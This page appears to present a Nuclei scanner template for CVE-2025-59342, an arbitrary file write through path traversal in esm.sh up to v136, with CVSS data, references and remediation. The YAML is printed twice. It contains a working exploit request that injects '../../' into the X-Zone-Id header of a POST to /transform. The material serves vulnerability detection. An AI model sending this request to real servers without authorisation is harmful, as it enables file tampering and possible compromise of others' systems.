esm.sh <= v136 - Arbitrary File Write via Path Traversal

CVE-2025-59342

Verified

Description

esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting attackers write files outside the intended storage directory, exploit requires crafted header input.

Severity

Medium

CVSS Score

5.3

Exploit Probability

Affected Product

esm.sh

Published Date

April 17, 2026

Template Author

0x_akoko

CVE-2025-59342.yaml

id: CVE-2025-59342

info:
  name: esm.sh <= v136 - Arbitrary File Write via Path Traversal
  author: 0x_Akoko
  severity: medium
  description: |
   esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting attackers write files outside the intended storage directory, exploit requires crafted header input.
  impact: |
   Attackers can write files to arbitrary directories, potentially leading to system compromise or data tampering.
  remediation: |
   Update to a version later than 136 or the latest available version.
  reference:
    - https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw
    - https://www.exploit-db.com/exploits/52461
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59342
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-59342
    cwe-id: CWE-24
    epss-score: 0.06448
    epss-percentile: 0.91174
  metadata:
    verified: true
    max-request: 2
    vendor: esm-dev
    product: esm.sh
    shodan-query: http.html:"esm.sh"
  tags: cve,cve2025,esm,path-traversal,file-write,unauth

variables:
  randfile: "{{to_lower(rand_text_alpha(8))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_any(body, "esm.sh", "A no-build JavaScript CDN", "import React from")
        condition: and
        internal: true

  - raw:
      - |
        POST /transform HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Zone-Id: ../../modules/transform/{{randfile}}/

        {"filename":"{{randfile}}.js","lang":"js","code":"console.log('nuclei');","importMap":{"imports":{"react":"https://esm.sh/react"}},"target":"es2022","sourceMap":"external","minify":true}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
          - contains_all(body, "code", "map")
        condition: and
# digest: 4a0a00473045022100923ac9ede2082c365971eb160d73462d539949aa04df28ce9d8019abc98bd5ce022056b32028c690f623fbf1087a51c67f5e153430264f66f738704458407d5bd257:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

CVE ID:

cve-2025-59342

CWE ID:

cwe-24

References

https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw https://www.exploit-db.com/exploits/52461 https://nvd.nist.gov/vuln/detail/CVE-2025-59342

Remediation Steps

Update to a version later than 136 or the latest available version.

id: CVE-2025-59342

info:
  name: esm.sh <= v136 - Arbitrary File Write via Path Traversal
  author: 0x_Akoko
  severity: medium
  description: |
   esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting attackers write files outside the intended storage directory, exploit requires crafted header input.
  impact: |
   Attackers can write files to arbitrary directories, potentially leading to system compromise or data tampering.
  remediation: |
   Update to a version later than 136 or the latest available version.
  reference:
    - https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw
    - https://www.exploit-db.com/exploits/52461
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59342
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-59342
    cwe-id: CWE-24
    epss-score: 0.06448
    epss-percentile: 0.91174
  metadata:
    verified: true
    max-request: 2
    vendor: esm-dev
    product: esm.sh
    shodan-query: http.html:"esm.sh"
  tags: cve,cve2025,esm,path-traversal,file-write,unauth

variables:
  randfile: "{{to_lower(rand_text_alpha(8))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_any(body, "esm.sh", "A no-build JavaScript CDN", "import React from")
        condition: and
        internal: true

  - raw:
      - |
        POST /transform HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Zone-Id: ../../modules/transform/{{randfile}}/

        {"filename":"{{randfile}}.js","lang":"js","code":"console.log('nuclei');","importMap":{"imports":{"react":"https://esm.sh/react"}},"target":"es2022","sourceMap":"external","minify":true}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/json")
          - contains_all(body, "code", "map")
        condition: and
# digest: 4a0a00473045022100923ac9ede2082c365971eb160d73462d539949aa04df28ce9d8019abc98bd5ce022056b32028c690f623fbf1087a51c67f5e153430264f66f738704458407d5bd257:922c64590222798bb761d5b6d8e72950

esm.sh <= v136 - Arbitrary File Write via Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

esm.sh <= v136 - Arbitrary File Write via Path Traversal

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps